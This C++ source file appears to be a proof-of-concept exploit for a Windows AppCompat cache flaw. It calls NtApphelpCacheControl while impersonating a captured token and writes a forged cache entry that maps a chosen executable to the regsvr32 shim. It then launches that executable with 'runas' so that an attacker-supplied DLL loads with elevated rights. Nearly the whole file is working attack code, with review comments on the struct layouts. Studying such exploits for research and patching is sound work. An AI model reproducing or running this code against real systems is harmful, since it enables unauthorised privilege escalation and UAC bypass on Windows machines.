// AppCompatCache.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <string>
#include "sdb.h"

// 0x108 bytes: equal to the end offset (0x108) recorded in the field comments of
// ApphelpCacheControlData below, i.e. that struct's size for the layout those
// comments describe. Not referenced by the code shown in this file.
#define BUF_SIZE 0x108

// Command selector passed as the first argument of NtApphelpCacheControl.
// Each enumerator is numbered explicitly so its wire value (0..12) is visible.
// Trailing notes record the control code each command was observed to map to,
// and whether it appeared to require admin rights.
// NOTE(review): entries 4-11 carry an extra '0' (e.g. 0x220013) compared with
// the 0x22003 + 4*n progression of entries 0-3; likely a typo -- confirm.
enum APPHELPCOMMAND
{
	AppHelpQuery          = 0,  // 0x22003 DeviceIoControl
	AppHelpRemove         = 1,  // 0x22007
	AppHelpUpdate         = 2,  // 0x2200B (Admin)
	AppHelpEnum           = 3,  // 0x2200F (Admin) (looks unused)
	AppHelpNotifyStart    = 4,  // 0x220013 (Admin)
	AppHelpWriteRegistry  = 5,  // 0x220017 (Admin)
	AppHelpNotifyStop     = 6,  // 0x22001B (Admin)
	AppHelpForward        = 7,  // 0x22001F (looks to forward communication to helper service)
	AppHelpSnapshot       = 8,  // 0x220023 (Admin)
	AppHelpQueryModule    = 9,  // 0x220027
	AppHelpRefresh        = 10, // 0x22002B
	AppHelpCheckForChange = 11, // 0x22002F
	AppHelpQueryHwId      = 12, // not sent to the driver; handled by AchCacheQueryHwId
};

// Argument block passed (as `buf`) to NtApphelpCacheControl.
// The offset comments assume 4-byte HANDLE/pointer fields and an 8-byte
// UNICODE_STRING, i.e. a 32-bit build. On a 64-bit build the compiler lays
// these fields out differently and the listed offsets do not hold.
// NOTE(review): field meanings appear to be reverse-engineered; the `unk*`
// regions are of unknown purpose.
struct ApphelpCacheControlData
{
	BYTE   unk0[0x98];          // 0x00 -> 0x98 (all zeros?)
	DWORD  query_flags;           // 0x98; main() sets 0xFF
	DWORD  cache_flags;         // 0x9C; main() sets 1
	HANDLE file_handle;	    // 0xA0: open handle to the target file (set by main())
	HANDLE process_handle;	    // 0xA4: not set in the code shown here
	UNICODE_STRING file_name;   // 0xA8: \??\-prefixed path of the target file (set by main())
	UNICODE_STRING package_name;// 0xB0: not set in the code shown here
	DWORD          buf_len;     // 0xB8: size in bytes of `buffer`
	LPVOID         buffer;      // 0xBC: main() points this at an APPHELP_QUERY
	BYTE           unkC0[0x2C]; // 0xC0 -> 0xEC
	UNICODE_STRING module_name; // 0xEC (used for command 9, AppHelpQueryModule)
	BYTE           unkF4[0x14]; // 0xF4 -> 0x108
};

// Signature used to call ntdll!NtApphelpCacheControl via GetProcAddress:
// `type` selects the command; main() passes an ApphelpCacheControlData as `buf`.
typedef NTSTATUS(NTAPI *_NtApphelpCacheControl)(APPHELPCOMMAND type, void* buf);
// Signature used to call ntdll!RtlInitUnicodeString via GetProcAddress.
typedef VOID(NTAPI *_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);

// Defined elsewhere in the project. main() installs the returned handle with
// SetThreadToken around the AppHelpUpdate call.
HANDLE CaptureImpersonationToken();

// Payload referenced by ApphelpCacheControlData::buffer; main() builds one and
// stores it in the AppCompat cache via AppHelpUpdate.
// Offsets below follow from 4-byte int and 16-byte GUID members.
// NOTE(review): field meanings appear reverse-engineered; `unk*` members are unknown.
struct APPHELP_QUERY
{
	int match_tags[16];    // 0x00: SDB TAGIDs; main() stores the regsvr32 EXE tag in [0]
	int unk40[16];         // 0x40: unknown
	int layer_tags[8];     // 0x80
	int flags;             // 0xA0
	int main_tag;          // 0xA4
	int match_count;       // 0xA8: presumably number of valid match_tags entries (main() sets 1)
	int layer_count;       // 0xAC: presumably number of valid layer_tags entries (main() sets 0)
	GUID exe_guid;         // 0xB0
	int unkC0[264/4];      // 0xC0 -> 0x1C8: unknown; main() sets [0] = 1
};

// Defined elsewhere in the project. GetTagForRegsvr32() calls
// resolveSdbFunctions() before using any of the Sdb*Ptr function pointers
// declared below. Presumably it fills them in and returns nonzero on success.
// NOTE(review): confirm against its definition.
BOOL resolveSdbFunctions();
extern SdbOpenDatabase SdbOpenDatabasePtr;
extern SdbCloseDatabase SdbCloseDatabasePtr;
extern SdbTagToString SdbTagToStringPtr;
extern SdbGetFirstChild SdbGetFirstChildPtr;
extern SdbGetTagFromTagID SdbGetTagFromTagIDPtr;
extern SdbGetNextChild SdbGetNextChildPtr;
extern SdbReadBinaryTag SdbReadBinaryTagPtr;

// Depth-first search beneath `tid` for a TAG_EXE_ID child whose binary value
// equals `exe_guid`.
//
// db       - open shim database.
// tid      - tag whose subtree is searched (TAGID_ROOT for the whole database).
// exe_guid - GUID to compare against each TAG_EXE_ID value.
//
// Returns the TAGID of the tag that *contains* the matching TAG_EXE_ID (the
// parent whose children are being scanned), or TAGID_NULL if none matches.
TAGID findExeByGuid(PDB db, TAGID tid, REFGUID exe_guid)
{
	for (TAGID child = SdbGetFirstChildPtr(db, tid);
		child != TAGID_NULL;
		child = SdbGetNextChildPtr(db, tid, child))
	{
		const TAG tag = SdbGetTagFromTagIDPtr(db, child);

		if ((tag & 0xFFFF) == TAG_EXE_ID)
		{
			GUID guid;
			if (SdbReadBinaryTagPtr(db, child, reinterpret_cast<PBYTE>(&guid), sizeof(guid))
				&& IsEqualGUID(guid, exe_guid))
			{
				// The EXE_ID is a child of the entry we want; return that parent.
				return tid;
			}
		}

		// The tag's type is encoded in its top nibble; only list tags have
		// children worth descending into.
		if ((tag & 0xF000) == TAG_TYPE_LIST)
		{
			const TAGID found = findExeByGuid(db, child, exe_guid);
			if (found != TAGID_NULL)
			{
				return found;
			}
		}
	}

	return TAGID_NULL;
}

// Opens \SystemRoot\AppPatch\sysmain.sdb and returns the TAGID of the entry
// whose TAG_EXE_ID equals the hard-coded GUID below. Per this function's name,
// that is the regsvr32 entry.
//
// Returns TAGID_NULL (0) on any failure:
//   - the Sdb* pointers could not be resolved;
//   - the GUID string did not parse;
//   - the database could not be opened;
//   - no entry matched.
TAGID GetTagForRegsvr32()
{
	// Every Sdb*Ptr call below goes through these pointers; bail out instead of
	// calling through unresolved ones.
	if (!resolveSdbFunctions())
	{
		printf("Failed to resolve SDB functions\n");
		return TAGID_NULL;
	}

	// Parse first: if this fails, `guid` would otherwise be used uninitialized.
	GUID guid;
	if (FAILED(IIDFromString(L"{2C7437C1-7105-40D3-BF84-D493A4F62DDB}", &guid)))
	{
		printf("Failed to parse EXE GUID\n");
		return TAGID_NULL;
	}

	PDB db = SdbOpenDatabasePtr(L"\\SystemRoot\\AppPatch\\sysmain.sdb", NT_PATH);
	if (!db)
	{
		printf("Failed to load SDB file %lu\n", GetLastError());
		return TAGID_NULL;
	}

	const TAGID ret = findExeByGuid(db, TAGID_ROOT, guid);

	SdbCloseDatabasePtr(db);

	return ret;
}

int _tmain(int argc, _TCHAR* argv[])
{	
	if (argc < 3)
	{
		printf("Usage: AppCompatCache path dllpath\n");		
		return 1;
	}

	WCHAR dllpath_buf[MAX_PATH];

	if (!GetFullPathName(argv[2], MAX_PATH, dllpath_buf, nullptr))
	{
		printf("Couldn't get fullpath to dll %d\n", GetLastError());
		return 1;
	}

	std::wstring dllpath;

	dllpath = L"\"";
	dllpath += dllpath_buf;
	dllpath += L"\"";

	TAGID tag = GetTagForRegsvr32();
	if (tag == 0)
	{
		printf("Failed to get SDB tag for regsvr32\n");
		return 1;
	}

	printf("Found regsvr32.exe tag: %08X\n", tag);

	HANDLE token = CaptureImpersonationToken();
	_RtlInitUnicodeString fRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlInitUnicodeString");
	_NtApphelpCacheControl fNtApphelpCacheControl = (_NtApphelpCacheControl)GetProcAddress(GetModuleHandle(L"ntdll"), "NtApphelpCacheControl");

	ApphelpCacheControlData data = { 0 };

	std::wstring full_path = L"\\??\\";
	full_path += argv[1];

	printf("Interposing on cache for %ls\n", full_path.c_str());

	fRtlInitUnicodeString(&data.file_name, full_path.c_str());

	data.file_handle = CreateFile(argv[1], FILE_READ_ATTRIBUTES, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
		nullptr, OPEN_EXISTING, 0, 0);
	if (data.file_handle == INVALID_HANDLE_VALUE)
	{
		printf("Error opening file %ls %d\n", argv[1], GetLastError());
		return 1;
	}

	data.query_flags = 0xFF;
	data.cache_flags = 1;
		
	APPHELP_QUERY query = { 0 };
	query.match_count = 1;
	query.layer_count = 0;	
	query.match_tags[0] = tag;
	query.unkC0[0] = 1;

	data.buffer = &query;
	data.buf_len = sizeof(query);

	int status = -1;

	// Ensure it the cache if flushed
	fNtApphelpCacheControl(AppHelpRemove, &data);	

	if (SetThreadToken(nullptr, token))
	{
		status = fNtApphelpCacheControl(AppHelpUpdate, &data);
		RevertToSelf();		
	}		
	else
	{
		status = GetLastError();
	}

	if (status == 0)
	{
		LPCWSTR verb = L"runas";

		if ((argc > 3) && (wcscmp(argv[3], L"-n") == 0))
		{
			verb = L"open";
		}

		printf("Calling %ls on %ls with command line %ls\n", verb, argv[1], dllpath.c_str());

		ShellExecuteW(nullptr, verb, argv[1], dllpath.c_str(), nullptr, SW_SHOW);		

		printf("Remove: %08X\n", fNtApphelpCacheControl(AppHelpRemove, &data));
	}
	else
	{
		printf("Error adding cache entry: %08X\n", status);
	}

	return 0;
}

